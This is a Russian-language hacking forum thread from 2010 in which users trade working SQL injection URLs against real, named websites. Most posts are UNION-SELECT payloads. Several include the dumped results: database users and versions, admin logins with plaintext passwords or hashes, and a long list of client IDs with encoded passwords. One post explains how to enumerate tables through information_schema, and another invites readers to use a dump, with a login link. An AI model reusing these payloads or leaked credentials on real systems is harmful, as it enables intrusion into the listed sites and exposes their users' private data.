RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-06-30 00:06:22.713333
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.kvvm.hu/nemzetiparkokhete/index.php?id=-1+union+select+1,2,3,concat_ws(user(),version(),database()),5,6,7,8,9,10--
|
|
|
RE: Ваши Sql-инъекции - 2010-06-30 12:07:37.163333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.bishopdwenger.com/content.php?category=service&id=-1+union+select+1,concat_ws(0x3a,user(),version(),database())-- http://www.bishopdwenger.com/content.php?category=service&id=-1+union+select+1,concat_ws(0x3a,moderator_username,moderator_password,moderator_email)+from+organization_moderators+limit+5,1-- модераторы http://www.bishopdwenger.com/content.php?category=service&id=-1+union+select+1,concat_ws(0x3a,username,password,email)+from+admin+limit+0,1-- админы
|
|
|
RE: Ваши Sql-инъекции - 2010-06-30 22:18:03.173333
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.big-beg.ru/resume/index.php?id=-1+union+select+1,2,concat_ws(version(),database(),user()),4--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 11:22:25.600000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://bluesoleil.com/download/Detail.aspx?PID=1'
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 11:46:33.440000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
quote:
ORIGINAL: reigan http://bluesoleil.com/download/Detail.aspx?PID=1' Да… ну и скуля… жесть конечно… в жизни бы не догадался… Спасибо КЭП :)
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 13:12:11.913333
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
если такой умный раскрути)))
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 14:10:26.743333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
Там нечего крутить…
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 19:08:46.896666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
quote:
ORIGINAL: reiganесли такой умный раскрути))) Если такой умный, кавычка - не sql-инъекция.
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 19:51:03.463333
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.traindisaster.ru/database.php?id=-1+UNION+SELECT+1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- http://www.kitana.ru/razdel.php?id=-1+union+select+1,2, 3,concat_ws(version(),database(),user())--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 19:55:01.136666
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://ocenshik.mostpp.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(user(),version(),database()),6,7,8--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 20:15:26.020000
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.flatsminsk.com/info.php?id=-1+UNION+SELECT+1,2,3,4,5 ,6,7,8, 9,10,11,concat_ws(version(),user(),database()),13--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 20:30:22.693333
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.psychiatry.ru/lib_show.php?id=-1+union+select+1, 2,concat_ws(version(),database(),user()),4,5,6--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 20:40:18.243333
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://versos.ru/verso.html?id=-1+union+select+concat_ws(version(),database(),user()), 2,3,4--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 20:48:46.206666
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.fkefir.ru/person.php?id=-1+union+select+1,2,3,4,5,concat_ws(user(),version(),database()),7,8,9 ,10,11-- Че за грнуппа такая?)
|
|
|
RE: Ваши Sql-инъекции - 2010-07-01 20:54:08.210000
|
|
|
lockdock
Сообщений: 201
Оценки: 0
Присоединился: 2010-06-03 06:37:40.766666
|
http://www.14000.ru/section.php
?id=-1+UNION+SELECT+1,concat_ws(user(),version(),database()),3 ,4,5,6,7,8,9,10,11,12,13,14--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-02 11:41:04.956666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.ndt.net/ndtaz/content.php?id=-1+union+select+1,concat_ws(0x3a,username,passwort,email),3,4,5,6,7+from+Profile+limit+0,1-- Юзайте на здоровье ;) Вход: http://www.ndt.net/login.php
|
|
|
RE: Ваши Sql-инъекции - 2010-07-02 15:51:01.283333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.maeban.co.th/view_article.php?id=-21+union+select+1,concat_ws(version(),database(),user()),3, 4,5-- ver:5.1.41 base:maebanco_c4db1 datadir:/usr/local/mysql/data/ basedir:/usr/local/mysql-5.1.41-linux-x86_64/ os:unknown-linux-gnu user:maebanco_c4db1@localhost tmpdir:/tmp admin:$Pu0YRIe9Htx6t3eDYB2R0HY6uhG/y20
|
|
|
RE: Ваши Sql-инъекции - 2010-07-02 17:14:10.443333
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.keytex.ru/index.php?page=news_view&id=-161+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())-- Version: 4.1.22-standard User: keytexc_site@localhost Database: keytexc_site
|
|
|
RE: Ваши Sql-инъекции - 2010-07-02 17:35:14.560000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.vashafirma.ru/index.php?id=-867+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,concat_ws(0x3a,version(),user(),database()),52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71-- Version: 5.0.67-log User: u40759@10.10.10.221 Database: u40759
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 13:18:29.503333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.rsapc.com/projects/detail.php?id=-185+union+select+1,user(),version(),database(),5,6,7,8,9,10,11,12-- silman@localhost 4.0.27-log silman
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 13:23:48.846666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.wechv.com/detail.php?id=-3+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- wechv@localhost 4.1.22-standard wechv
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 13:30:37.213333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.athandtheatre.com/show-detail.php?id=-53+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- Сорок одно поле, ужас. athand_admin@208.109.181.55 4.1.24-max-log athand_admin
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 13:43:45.893333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.friendfolks.com/store-detail.php?ID=-281+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- riend@localhost 5.0.67 friendfolks_com_-_maindb
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 16:07:20.896666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://carnegie-fitness.com/eng/product.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 16:09:22.590000
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.ultimatumz.com/product.php?id=-2+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-03 17:11:35.553333
|
|
|
matcal koyshek
Сообщений: 73
Оценки: 0
Присоединился: 2010-06-25 18:16:58.390000
|
ZiMMy В версии SQL5 есть таблица information_schema.tables http://www.ultimatumz.com/product.php?id=-2+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=0x646239333431305f556c74696d6174756d5a%20– Можно так сделать)Просто? В конце строки это database d SQL hex x3k.ru
|
|
|
RE: Ваши Sql-инъекции - 2010-07-04 15:23:48.443333
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://richterreport.com/content.php?id=1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16-- В заголовке
|
|
|
RE: Ваши Sql-инъекции - 2010-07-04 15:35:15.300000
|
|
|
matcal koyshek
Сообщений: 73
Оценки: 0
Присоединился: 2010-06-25 18:16:58.390000
|
http://www.rdsm.fr/news.php?id=-1081+union+select+1,concat_ws%280x3a3a3a,username,password%29,3,4+from+m_admin+limit+0,10+--+ username:Peter password:0379cc7b94e128f1f2adcf93e77f2783
|
|
|
RE: Ваши Sql-инъекции - 2010-07-04 15:36:23.566666
|
|
|
matcal koyshek
Сообщений: 73
Оценки: 0
Присоединился: 2010-06-25 18:16:58.390000
|
http://www.budd-marseille.fr/news.php?ID=-44+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6275646467726f757032+--+
|
|
|
RE: Ваши Sql-инъекции - 2010-07-04 15:38:24.230000
|
|
|
matcal koyshek
Сообщений: 73
Оценки: 0
Присоединился: 2010-06-25 18:16:58.390000
|
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28table_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema=0x636d323330363737+--+ http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,pays,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+from+clients+limit+0,20+--+ http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28column_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x636c69656e7473+--+
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,id,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+from+clients+limit+0,20+--+ 1:1970121228079:MTIzNDU2,2:1983021235267:ZnJhbWJvaXNl,3:1942111207323:Ym9ibzA0,4:1964061226573:NDc0ODQ5,5:1970101467360:a2FyY3pv,6:1963031222945:cmNucmNu,7:1961091220739:UlVHQlkxNTEz,8:1945111207779:ZXVza2FkaQ==,9:1973111028840:QVhURUpVOTkwNjA4,10:1970121228079:dG90bzMx,11:1976071042514:cm9tYW5l,12:1947061210943:aGVsbGlv,13:1972071231945:cHVwdWNl,14:1976011235141:MjgwMTc2,15:1990021237103:bGVzYW5nbGVz,16:1964051227246:cWhlZjR6eg==,17:1988091112871:dXNhcGlzdGU=,18:1979051401914:bDJvMmkwYzU3OQ==,19:1989031303020:dGhvbWFz,20:1944121206310:c2JuY2Fy,21:1961031223343:amVyZW15,22:1972011025426:dG90b3BoZQ==,23:1970051230459:MjkwMTAx,24:1981031532710:czEzMTk4MWE=,25:1965111273819:MjgwNzk1,26:1946051205443:MzEwNTE5NDY=,27:1989011122555:Y29yZW50aW4=,28:1970101523585:MDkwMTk4,29:1953061212259:NTYxMTE5,30:1987041102346:amlyZWxsYQ==,31:1988011116951:bTIzMDE4OA==,32:1988041546172:cGVybG91,33:1992111160083:cnVnYnlwZXJjaGU=,34:1989071127908:aHVsY2sx,35:1980041268803:dGFiZXJuYWNsZQ==,36:1978 http://www.viti-charentes.fr/portail/news.php?id=-9+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29,7+from+information_schema.tables+where+table_schema=0x706f727461696c+--+ user:webuser@localhost database:portail version:5.0.26-log
|
|
|
RE: Ваши Sql-инъекции - 2010-07-06 14:21:39.530000
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
http://www.ukfinewatches.com/buy.php?id=-33+union+select+1,2,3,4,5,version(),database(),8,9,10,11,12,13,14,15,16,17,18,user()--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-09 17:14:00.646666
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
http://asmaasociety.org/news_details.php?id=-1994+union+all+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8+from+user-- admin:lg452v
|
|
|
RE: Ваши Sql-инъекции - 2010-07-09 22:31:37.666666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://pharmacychatnow.com/news_details.php?id=-1+UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-10 08:34:56.900000
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
http://www.mt8.ru/index.php?action=product_view&id=-99+union+select+1,2,concat_ws(0x3a,version(),user(),database))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 09:33:29.453333
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.elenaparent.com/news/view_news.php?id=-1+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 09:42:53.886666
|
|
|
webkraft
Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
|
http://www.tinitop.com/tininew/view_news.php?id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 09:47:07.876666
|
|
|
rinspit
Сообщений: 94
Оценки: 0
Присоединился: 2009-08-11 12:07:00.640000
|
подскажите автоматизацию поиска инъекции, без гугла, как протестировать на уязвимость именно sql программой?кто поделится?
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 10:31:39.796666
|
|
|
rinspit
Сообщений: 94
Оценки: 0
Присоединился: 2009-08-11 12:07:00.640000
|
admin admin :)
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 10:43:12.016666
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.peskarlib.ru/lib.php?id_sst=-273+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13--+ Version: 5.1.48 User: dobro@localhost Database: peskar
|
|
|
RE: Ваши Sql-инъекции - 2010-07-11 13:54:39.320000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://www.doctorcall.ru/index.php?id=-17+union+select+1,2,group_concat(id,0x3a,name,0x3a,email,0x3a,tel,0x3a,date,0x0b),4+from+clients--+
|
|
|
|
|